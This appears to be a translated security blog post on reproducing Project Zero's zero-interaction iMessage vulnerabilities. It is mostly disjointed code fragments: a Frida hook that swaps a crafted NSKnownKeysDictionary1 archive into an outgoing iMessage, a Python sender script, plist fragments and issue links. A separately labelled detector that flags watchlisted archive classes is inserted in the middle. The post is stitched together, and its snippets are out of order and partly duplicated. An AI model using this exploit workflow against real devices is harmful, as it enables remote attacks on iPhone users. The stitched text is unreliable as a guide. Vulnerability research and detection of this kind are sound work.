This post comes from exchen of the Momo security team. Last time he explained the mystery of iOS rebooting when it loads a malformed image (iOS 加载异常图片系统重启之迷); this time, what does he bring us from the "zero-interaction" iMessage vulnerabilities found by members of Google's Project Zero team? Let's read on.
brew install python3
pip3 install frida
# receiver = "YOUR EMAIL"   # the Apple ID / e-mail address of the receiving test device
receiver = "[email protected]"
// var d = ObjC.classes.NSData.dataWithContentsOfFile_("PATH/obj");  // generic form: path to the obj file
var d = ObjC.classes.NSData.dataWithContentsOfFile_("/Users/exchen/Downloads/knownkeydict/obj");
python3 sendMessage.py
console.log(dict); // print the original, unmodified message body
// modify the normal message body to construct the message body carrying the bug
var newDict = ObjC.classes.NSMutableDictionary.dictionaryWithCapacity_(dict.count());
var d = ObjC.classes.NSData.dataWithContentsOfFile_("/Users/exchen/Downloads/knownkeydict/obj");
console.log(d); // print the obj file
newDict.setObject_forKey_("com.apple.messages.MSMessageExtensionBalloonPlugin:0000000000:com.apple.mobileslideshow.PhotosMessagesApp", "bid");
newDict.setObject_forKey_(d, "bp"); // the obj file
// newDict.setObject_forKey_("com.apple.messages.URLBalloonProvider", "bid");
newDict.setObject_forKey_(8, "gv");
newDict.setObject_forKey_(0, "pv");
newDict.setObject_forKey_(1, "v");
newDict.setObject_forKey_("FAA29682-27A6-498D-8170-CC92F2077441", "gid");
newDict.setObject_forKey_(d, "bp");
newDict.setObject_forKey_("CB2F0B8D-84F6-480E-9079-27DA53E14EBD", "r");
newDict.setObject_forKey_(1, "v");
newDict.setObject_forKey_("\ufffd\ufffc", "t"); // JavaScript uses lowercase \u escapes; "\U" would be a literal string
args[0] = newDict.handle;
<dict>
<key>$classes</key>
<array>
<string>NSDictionary</string>
<string>NSObject</string>
</array>
<key>$classname</key>
<string>NSKnownKeysDictionary1</string>
</dict>
<dict>
<key>$classes</key>
<array>
<string>NSKnownKeysMappingStrategy1</string>
<string>NSObject</string>
</array>
<key>$classname</key>
<string>NSKnownKeysMappingStrategy1</string>
</dict>
<string>i am very long indeed</string>
<dict>
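As an added example (not part of the original post or of the Project Zero scripts), the Python below uses plistlib to walk the `$objects` table of an NSKeyedArchiver plist and flag the two kinds of class descriptor shown in the fragment above: a class name on a watchlist, and a `$classname` that is not the first entry of its own `$classes` list. The watchlist and the mismatch heuristic are this example's own assumptions, and the sample archive is constructed inline to mirror the fragment.

```python
import plistlib

# Assumed watchlist for this example: the class names that appear in the
# $classname fields of the fragment above.
WATCHLIST = {"NSKnownKeysDictionary1", "NSKnownKeysMappingStrategy1"}


def build_archive(objects):
    """Wrap a $objects table in a minimal NSKeyedArchiver-style binary plist."""
    return plistlib.dumps(
        {"$version": 100000, "$archiver": "NSKeyedArchiver",
         "$top": {"root": plistlib.UID(1)}, "$objects": objects},
        fmt=plistlib.FMT_BINARY)


def audit_archive(data):
    """Return a list of findings for one archive; an empty list means nothing was flagged."""
    archive = plistlib.loads(data)
    if archive.get("$archiver") != "NSKeyedArchiver":
        return ["not an NSKeyedArchiver payload"]
    findings = []
    for idx, obj in enumerate(archive.get("$objects", [])):
        # Class descriptors are the dicts carrying $classname / $classes.
        if not isinstance(obj, dict) or "$classname" not in obj:
            continue
        name = obj["$classname"]
        classes = list(obj.get("$classes", []))
        if name in WATCHLIST:
            findings.append(f"$objects[{idx}]: watchlisted class {name}")
        # Heuristic (assumption): a well-formed descriptor lists the class
        # itself first in $classes, so a mismatch is worth a closer look.
        if not classes or classes[0] != name:
            findings.append(
                f"$objects[{idx}]: $classname {name} not first in $classes {classes}")
    return findings


# Constructed sample mirroring the fragment above: the first descriptor names
# NSKnownKeysDictionary1 but lists NSDictionary/NSObject in $classes.
SAMPLE = build_archive([
    "$null",
    {"$class": plistlib.UID(2), "NS.keys": [], "NS.objects": []},
    {"$classname": "NSKnownKeysDictionary1",
     "$classes": ["NSDictionary", "NSObject"]},
    {"$classname": "NSKnownKeysMappingStrategy1",
     "$classes": ["NSKnownKeysMappingStrategy1", "NSObject"]},
    "i am very long indeed",
])

if __name__ == "__main__":
    for finding in audit_archive(SAMPLE):
        print(finding)
```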
// Archive a plain dictionary with NSKeyedArchiver to see what a normal archive looks like on disk
NSError *err = nil;
NSDictionary* obj = @{@"testKey": @"testValue", @"testArray":@[@100, @200, @300], @"testDict":@{@"dictKey":@"dictValue"}};
NSData* data = [NSKeyedArchiver archivedDataWithRootObject:obj requiringSecureCoding:YES error:&err];
if (!data) {
    NSLog(@"Error: %@", err);
    return;
}
[data writeToFile:@"/Users/exchen/Downloads/archive_test" atomically:YES];
subprocess.call(["osascript", "sendMessage.applescript", receiver, "REPLACEME"])
Then in injectMessage.js, REPLACEME must also be kept consistent with the custom message content:
if (t == "REPLACEME")
References:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1884
https://bugs.chromium.org/p/project-zero/issues/detail?id=1874
https://bugs.chromium.org/p/project-zero/issues/detail?id=1873
https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
Author: exchen
About 《九阴真经——IOS黑客攻防秘籍》: The book is easy to understand and lets readers learn iOS security techniques step by step and systematically. It first gives a detailed introduction to jailbreak-environment development and reverse-engineering tools, then covers assembly basics, dynamic debugging, static analysis, injection and hooking, and file formats, and finally presents topics such as app cracking and app protection, privacy harvesting and forensics, volume boosting and cheating, unique device IDs, and the internals of packers. Book details 👇 https://www.exchen.net/ios-hacker-secret-book-contents.html
-end-
Momo Security will keep bringing you more and better technical sharing in the days ahead.
See you next time 👋
Momo Security is committed to protecting, through pragmatic work, the information security of all Momo products and their hundreds of millions of users; to embracing, with an open mind, win-win collaboration among security organizations, teams, and individuals; and to supporting the personal development and career growth of outstanding colleagues with a free atmosphere and rich resources.